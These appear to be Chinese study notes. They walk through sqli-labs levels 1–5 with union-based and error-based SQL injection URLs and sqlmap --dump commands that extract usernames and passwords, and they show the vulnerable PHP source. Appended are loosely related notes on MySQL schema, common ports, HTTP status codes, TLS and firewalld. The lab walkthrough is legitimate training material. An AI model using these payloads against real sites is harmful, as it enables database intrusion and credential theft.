# 第一关 基于错误的 GET 单引号字符型注入

![image.png](https://rrx.cool/static/img/e32a823e5e8a5bed961547f4c4a00b4e.image.webp)



## 存在注入点判断
1. 加上单引号报错

```
http://192.168.220.130/sqli/Less-1/?id=1'
```

2. 加上注释符页面正常

```
http://192.168.220.130/sqli/Less-1/?id=1' %23
```

- 注释方法：

1. `#` 号注释
2. `%23` 注释
3. `--+` 注释

## 判断字段数（使用 order by）
```
http://192.168.220.130/sqli/Less-1/?id=1' order by 3 %23 # 页面正常
http://192.168.220.130/sqli/Less-1/?id=1' order by 4 %23 # 页面显示错误
```
说明字段数为 3

## 执行注入 Payload
判断显示的信息点，通过 `id=-1` 来执行联合查询

```
http://192.168.220.130/sqli/Less-1/?id=-1' union select 1,2,3 %23
```

:::info{title="常用查询信息"}
1. databases() 在使用的数据库
2. user() 用户信息
3. version() 数据库版本信息
4. @@basedir 数据库安装路径
5. @@version_compile_os 操作系统版本
:::

查看数据库信息：


:::tip{title="group_concat"}
将查询到的多行结果连接成字符串，其中 `separator` 可指定连接符
:::

1. 查看表名

```
http://192.168.220.130/sqli/Less-1/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
```

2. 查看列名

```
http://192.168.220.130/sqli/Less-1/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users' --+
```

3. 查看字段

```
http://192.168.220.130/sqli/Less-1/?id=-1' union select 1,group_concat(username separator '-'),group_concat(password separator '-') from users --+
```


![image.png](https://rrx.cool/static/img/18b2483941c298a544562ad24db06e63.image.webp)

## sqlmap

```
sqlmap -u “注入地址” -v 1 –-dbs # 列举数据库
sqlmap -u “注入地址” -v 1 –-current-db # 当前数据库
sqlmap -u “注入地址” -v 1 –-users # 列数据库用户
sqlmap -u “注入地址” -v 1 -D “数据库” –-tables # 列举数据库的表名
sqlmap -u “注入地址” -v 1 -T “表名” -D “数据库” –-columns # 获取表的列名
sqlmap -u “注入地址” -v 1 -T “表名” -D “数据库” -C “字段” –-dump # 获取表中的数据
```

示例：

```
sqlmap -u "http://192.168.220.130/sqli/Less-1/?id=1" -v 1 -T 'users' -D 'security' -C id,username,password --dump
```

![image.png](https://rrx.cool/static/img/82e7ac16b56ae9ab9372e306c8c82f2a.image.webp)

# 第二关 基于错误的 GET 整型注入

![](https://rrx.cool/static/img/ac3696d92d63bcc5590742d931734c22.image.webp)

## 存在注入点判断
1. 加上单引号报错

```
http://192.168.220.130/sqli/Less-2/?id=1' --+
```

2. 加上 `and 1=1` 页面正常

```
http://192.168.220.130/sqli/Less-2/?id=1 and 1=1 --+
```

3. 加上 `and 1=2` 页面不正常

```
http://192.168.220.130/sqli/Less-2/?id=1 and 1=2 --+
```
说明执行了传入的 payload，存在注入

## 判断字段数

```
http://192.168.220.130/sqli/Less-2/?id=1 order by 3 --+ # 页面正常
http://192.168.220.130/sqli/Less-2/?id=1 order by 4 --+ # 页面显示错误
```

## 执行注入 Payload
1. 查看表名

```
http://192.168.220.130/sqli/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
```

2. 查看列名

```
http://192.168.220.130/sqli/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users' --+
```

3. 查看字段

```
http://192.168.220.130/sqli/Less-2/?id=-1 union select 1,group_concat(username separator '-'),group_concat(password separator '-') from users --+
```

![image.png](https://rrx.cool/static/img/76fcbb8ac4178ec4b31343c34fc3d13c.image.webp)

# 第三关 基于错误的 GET 单引号变形注入

![image.png](https://rrx.cool/static/img/1f5af9101abe009277551bcf4df59d00.image.webp)

## 存在注入点判断

1. 加上单引号报错，发现存在

```
http://192.168.220.130/sqli/Less-3/?id=1'
```

2. 尝试 )

```
http://192.168.220.130/sqli/Less-3/?id=1') and 1=1 --+ # 正常
http://192.168.220.130/sqli/Less-3/?id=1') and 1=2 --+ # 不正常
```

## 直接上 Payload 将数据库拖出

```
http://192.168.220.130/sqli/Less-3/?id=-1') union select 1,group_concat(username separator '-'),group_concat(password separator '-') from users --+
```

![image.png](https://rrx.cool/static/img/fed4600e0fc06e8810358e751ca58267.image.webp)


# 第四关 基于错误的 GET 双引号字符型注入

![image.png](https://rrx.cool/static/img/db0bed3437ed6c8a2795e705d513c47b.image.webp)

## 存在注入点判断
加上双引号报错，发现存在 "

```
http://192.168.220.130/sqli/Less-4/?id=1"
```

```
http://192.168.220.130/sqli/Less-4/?id=1") and 1=1 --+ # 页面正常
http://192.168.220.130/sqli/Less-4/?id=1") and 1=2 --+ # 页面不正常
```

## 直接上 Payload 将数据库拖出

```
http://192.168.220.130/sqli/Less-4/?id=-1") union select 1,group_concat(username separator '-'),group_concat(password separator '-') from users --+
```

![image.png](https://rrx.cool/static/img/e415bf05448f827cafeaa33e8fa5590c.image.webp)

## sqlmap

1-4 关都可以使用该命令

```
sqlmap -u "http://192.168.220.130/sqli/Less-4/?id=1" -v 1 -T 'users' -D 'security' -C id,username,password --dump
```
![image.png](https://rrx.cool/static/img/82e7ac16b56ae9ab9372e306c8c82f2a.image.webp)

## 源码分析

```php
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
// take the variables 
if(isset($_GET['id']))
{
$id=$_GET['id'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);

// connectivity 


$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

 if($row)
{
 echo "";
 echo 'Your Login name:'. $row['username'];
 echo " ";
 echo 'Your Password:' .$row['password'];
 echo "";
 }
 else 
{
 echo '';
 print_r(mysql_error());
 echo ""; 
}
}
 else { echo "Please input the ID as parameter with numeric value";}

?>
 </div><center>
<img src="../images/Less-1.jpg" /></center>
</body>
</html>
```
由源码看出对 GET 传入的参数未做任何过滤，并打印出错误信息，直接在数据库中查询，导致可以将payload传入拼接执行

# 第五关 基于 GET 单引号双注入

![image.png](https://rrx.cool/static/img/1bf8fae4507ec71780c4a7a7a41ece41.image.webp)

## 存在注入点判断
1. 输入单引号测试，有报错信息，返回信息和第一关错误信息一样
2. 不管输入 id 为多少，页面一直都是 you are in ... 猜测正确的页面不变，不会将查询结果打印到页面了，查看源码发现，确实是不输出结果了

```php
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
// take the variables
if(isset($_GET['id']))
{
$id=$_GET['id'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);

// connectivity 


$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

	if($row)
	{
 	echo '';	
 	echo 'You are in...........';
 	echo " ";
 	echo "";
 	}
	else 
	{
	
	echo '';
	print_r(mysql_error());
	echo "";	
	echo '';	
	
	}
}
	else { echo "Please input the ID as parameter with numeric value";}

?>
```
但是会把错误的信息打印出来，故应该使用到双注入（也称报错注入），在错误中把要的信息打印出来

## 报错注入方式
`updatexml()` : 函数是 MySQL 对 XML 文档数据进行查询和修改的 XPATH 函数。

`extractvalue()` : 函数也是 MySQL 对 XML 文档数据进行查询的 XPATH 函数。

`floor()` : MySQL中用来取整的函数。

其实可完成报错注入的 MySQL 函数有很多，大概有10几个，这里就不一一说了。

### updatexml(XML_document, XPath_string, new_valye);

它是一个内容替换函数，主要针对的 xml 数据：

第一个参数：`XML_document` 是 String 格式，为 XML 文档对象的名称，文中为 Doc 

第二个参数：`XPath_string` (Xpath 格式的字符串) ，如果不了解 Xpath 语法，可以在网上查找教程，和正则似的、也是做匹配用的，语法和正则不同而已

第三个参数：`new_value`，String格式，替换查找到的符合条件的数据

例如：

数据版本为5.5.53，那么 `concat` 连接之后，得到的结果为 `~5.5.53~``updatexml(1,~5.5.53~,1)`，其中 ~5.5.53~ 并不符合 xpath 的语法格式，所以会报错

### EXTRACTVALUE (XML_document, XPath_string);
从目标XML中返回包含所查询值的字符串。

第一个参数：`XML_document` 是 String 格式，为 XML 文档对象的名称

第二个参数：`XPath_string` (Xpath 格式的字符串)

`concat` : 返回结果为连接参数产生的字符串。

例如：`SELECT ExtractValue('<a>hello</a>', '/a/b');`

就是寻找前一段 xml 文档内容中的 `a` 节点下的 `b` 节点，这里如果 Xpath 格式语法书写错误的话，就会报错。这里就是利用这个特性来获得我们想要知道的内容。

## 执行注入 Payload
1. 查看表名

```
http://192.168.220.130/sqli/Less-5/?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema =database()),0x7e),1) --+
```

2. 查看列名

```
http://192.168.220.130/sqli/Less-5/?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema=database()),0x7e),1) --+
```

3. 查看字段

```
http://192.168.220.130/sqli/Less-5/?id=1' and updatexml(1,concat(0x7e,(select substring(group_concat(username),1) from users ),0x7e),1) --+
http://192.168.220.130/sqli/Less-5/?id=1' and updatexml(1,concat(0x7e,(select substring(group_concat(password),1) from users ),0x7e),1) --+
```

sqli-labs 1~5

# MySQL 数据结构

在练习靶场前我们需要了解以下 MySQL 数据库结构

MySQL5.0 以及 5.0 以上的版本都存在一个系统自带的系统数据库，叫做：`information_schema`

MySQL5.0 以下没有 `information_schema` 库，只能通过暴力猜解的方式来获取数据

`information_schema` 库里面包含了很多表





其中这几张表：`schemata`、`tables`、`columns`

这三张表依次分别存放着字段：

- `schemata` ：(schema_name-库名)

- `tables` ：(table_name-表名、table_schema-库名)

- `columns` ：(table_schema-库名、table_name-表名、column_name-字段名)



```mermaid
flowchart TD
information_schema --> schemata
information_schema --> tables
information_schema --> columns
schemata --> schema_name
tables --> table_name-表名
tables --> table_schema-库名
columns --> table_schema-库名
columns --> table_name-表名
columns --> column_name-字段名
```

其次就是5.0以上都是多用户多操作，5.0以下是多用户单操作。

## 创建用户和授权：

mysql5.7可以一句话搞定：
 
```SQL
grant all privileges on *.* 'user'@'%' identified by '123456';
```

mysql5.8必须分开做：

```SQL
 create user 'user'@'%' identified by '123456';
 grant all privileges on *.* to 'user'@'%';
```

## table函数
`table` 函数为 MySQL5.8 版本中新增的函数，其作用与 `select` 类似。

`table users;` 等同于 `select * from users;` 

但是 `table` 查询时，显示的始终是表的所有列，而且不可以用 `where` 字句来限定某个特定的行。
 
## values函数：
`select * from user union VALUES ROW(2,3);` 等同于 `select * from user union select 2,3;`

# 关于 `-` 和 `-+`
疑问：-- 在 SQL 语句中起到注释的作用，按理说 `--` 和 `--+` 作用是一样才对

看法：PHP 在接收接收参数时，会对参数进行一次 `urldecode`

如我们在浏览器地址栏输入网址时，会调用类似 `strip` 的函数去除首尾的空格

所以，如果后面如果原本接着字符，以这个举例子是 `--'` 那么这就是三个字符，后面没有字符 就不是 `-- '` 这样，MySQL 是不会把它解析为注释符号的。 但 URL 里 不能 `--` 因为会被浏览器之类的替换为空，所以把空格编码一下就是 `+` 啦！
 
当然这是 `get` 请求的情况，如果是 `post` 请求（且 `Content-Type` 不为 `x-www-form-urlencoded` 或与这个 `Content-Type` 类似效果），加 `+` 就有问题了， `+` 还是 `+`，而不是空格的 URL 编码，此时应把 `+` 替换为 `%20`，`urldecode` 后就是空格啦。经测试，一般出现在 HTTP头里的 `+` 会被 `urldecode` 为空格

sqli-labs 前言

ftp 21

ssh\sftp 22

telnet 23 # 很多交换机、路由器会用到telnet来进行管理，主要是用来做远程主机管理的

smtp 25 # 发邮件

pop3 110 # 收邮件



dns 53

smb 445 # 微软的文件共享，netstat -an -p tcp|findstr "LISTENING" windows必
开，139端口也是windows做共享的

https 443

http 80

apache 80 443

nginx 80 443

tomcat 8080

weblogic 7001

mysql 3306

mssql 1433

oracle 1521

postgresql 5432

redis 6379

mongdb 27017

vnc 5900 # 远程控制工具

IIS 80

jboss 8080

rdp == remote desktop protocol 3389

常见端口号

# 1	信息类

```html
100		Continue/继续		接受的请求正在处理，信息状态码
101		Switching Protocols/转换协议
101		SC_SWITCHING_PROTOCOLS		状态码是指服务器将按照其上的头信息变为一个不同的协议。这是
HTTP 1.1中新加入的。
```



# 2	成功类

```html
200		Success		服务器已成功处理了请求
201		Created/已创建
202		Accepted/接受
204		No Content/无内容		请求处理成功，但没有任何资源可以返回给客户端，一般用户客户端不需要服务端响应新内容时使用
```

# 3	重定向

```html
301		Moved Permanently		永久性重定向，表示资源已被分配新的URL
302		Found/找到		临时新重定向，表示资源临时被分配了新的URL，比如re.jd.com会自动跳转到www.jd.com
303		See Other/参见其他信息		这个状态码和301，302相似，如果最初的请求是 POST ，那么新文档（在定位头信息中给出）要用 GET 找回，这个状态码是新加入的 HTTP 1.1 中的
304		Not Modified/未修改		自从上次请求后，请求网页未修改过。服务器返回此响应时，不会返回网页内容，客户端看到的页面还是上一次请求缓存下来的页面。当客户端有一个缓存的文档，通过提供一个 IF-Modified-Since 请求头信息可指出客户端希望文档在指定日期之后有修改时才会重载此文档
307		Temporary Redirect/临时重定向		浏览器处理 307 状态的规则和 302 相同，307 状态被加入到HTTP 1.1中是由于许多浏览器在收到302响应时即使是原始消息为POST的情况下仍然执行了错误的转向。只有在收到303响应时才假定浏览器会在POST请求时重定向。添加这个新的状态码的目的很明确：在响应为303时按照GET和POST请求转向;而在307响应时则按照GET请求转向而不是POST请求。
```

# 4	客户端错误

```
400		Bad Request/错误请求		服务器不理解请求的语法
401		Unauthorized/未授权		表示发送的请求需要有通过 HTTP 认证的认证信息，客户端在授权头信息中没有有效的身份信息时访问受到密码保护的页面
403		Forbidden/禁止		服务器拒绝请求，意思是除非拥有授权否则服务器拒绝提供所请求的资源
404		Not Found/未找到		服务器找不到请求页面，也就是告诉客户端说给的地址无法找到如何资源
405		Method Not Allowed/方法未允许		指出请求方法（GET POST HEAD PUT DELETE等）对某些特定的资源不允许使用
406		Not Acceptable/无法访问		表示请求资源的MIME类型与客户端中Accept头信息中指定的类型不一致
```

# 5	服务器错误

```
500		Internal Server Error/内部服务器错误		表示服务器遇到错误，无法完成正常的请求处理，可能是web应用存在bug或某些临时崩溃了
501		Not Extended/尚未实施		表示服务器不支持当前请求所需要的某个功能
502		Bad Gateway/错误的网关		表示服务器作为网关或代理，从上游服务器收到无效响应，例如 Nginx+uWSGI，当uWSGI服务没有启动成功或异常退出，而Nginx服务是正常的情况下，就会看到502
503		Service Unavailable/服务无法获得		表示服务器处于停机维护或超负载，无法正常响应
504		Gateway Timeou/网关超时		表示扮演网关或者代理的服务器无法在规定的时间内获得想要的响应 502和504基本都是web服务器故障引起的
505		HTTP version Not Supported/HTTP 版本不支持
506		Variant Also Negotiates/变体协商		表示服务器内部配置错误
507		Insufficient Storage/存储错误		表示服务器无法存储完成请求所必须的内容，这个状况被认为是临时的，一般是数据库出问题时会看到这个状态码
```

# 总结单向认证的SSL/TLS的握手过程


1. 客户端请求服务端，携带者自己支持的SSl\TLS版本信息、随机数等
2. 服务端将证书、服务端的SSL\TLS版本信息发送给客户端，并且将自己的公钥(server_pub)放到证书中
3. 客户端对证书进行验证，验证通过后，将自己支持的对称加密算法方案发送给服务端，供服务端选择
4. 服务端选择一个优质的算法方案，然后将选择的方法明文发送给客户端
5. 客户端生成一个随机字符串pre_master_secret，通过协商好的算法计算得出对称加密的密钥secret_key，然后利用服务端的公钥server_pub对pre_master_secret进行非对称加密，得到mi_secret_key数据，然后将这个数据发送给服务端
6. 服务端利用自己的私钥对mi_secret_key进行解密，得到pre_master_secret，然后通过协商好的算法对pre_master_secret进行加密，得到密钥secret_key，然后利用选好的对称加密算法和secret_key对响应数据进行加密，然后发送给客户端
7. 客户端利用相同的对称加密算法和自己这一端保存的那个secret_key来解密得到响应数据

常见状态码

# Firewalld

防火墙默认只能连接 22 端口

```bash
systemctl start firewalld	# 开启
systemctl status firewalld	# 查看状态
systemctl stio firewalld	# 关闭
```




查看开放了哪些端口

```bash
firewall-cmd --list-ports
```

查看开放了哪些服务

```bash
firewall-cmd --list-services
```
还可以查看配置文件

```bash
cat /etc/firewalld/zones/public.xml
```

看一下ssh服务的端口

```bash
cat /usr/lib/firewalld/services/ssh.xml
```

80 端口其实并没有开放，想开放 80 端口，如下：


添加开放端口

```bash
firewall-cmd --zone=public --add-port=80/tcp --permanent # 开放80端口 --permanent表示永久开启，如果想临时开启，就不要加这个参数了。
```

关闭开放端口

```bash
firewall-cmd --zone=public --remove-port=80/tcp
```

添加服务，比如添加http服务,http默认端口为80，可以看配置文件

```bash
cat /usr/lib/firewalld/services/http.xml
firewall-cmd --zone=public --add-service=http 
```

删除服务

```bash
firewall-cmd --zone=public --remove-service=http 
```

firewall所有服务的定义的位置

```bash
/usr/lib/firewalld/services/
```

第一关 基于错误的 GET 单引号字符型注入

MySQL 数据结构

1 信息类

Firewalld

第一关基于错误的 GET 单引号字符型注入